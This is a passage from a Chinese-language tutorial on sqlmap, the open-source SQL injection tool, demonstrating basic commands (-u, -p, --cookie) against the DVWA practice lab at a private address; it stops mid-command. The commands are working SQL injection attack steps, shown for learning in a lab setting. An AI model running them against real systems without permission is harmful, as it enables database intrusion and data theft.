sqlmap 是一种开源渗透测试工具,可自动执行检测和利用 SQL 注入缺陷以及接管数据库服务器的过程。它配备了强大的检测引擎、许多适用于最终渗透测试人员的利基功能,以及广泛的开关,包括数据库指纹、从数据库获取数据、访问底层文件系统以及通过输出在操作系统上执行命令。
来自 Github
项目地址 https://github.com/sqlmapproject/sqlmap
下载即可使用,需要安装 python
一些基础用法
这里使用常用漏洞靶场 dvwa 作为演示
检测是否存在注入
sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#"
-
-u 指定要检测的 url,sqlmap 就会自动检测尝试可注入的参数
-
也可以添加 -p 指定参数,这里为 -p "id"
完整命令为
sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id"
由于 dvwa 需要登录,所以还需要指定 cookie,需要添加 --cookie
sqlmap -u "http://192.168.0.9/vulnerabilities/sqli/?id=1&Submit=Submit#" -p "id" --cookie "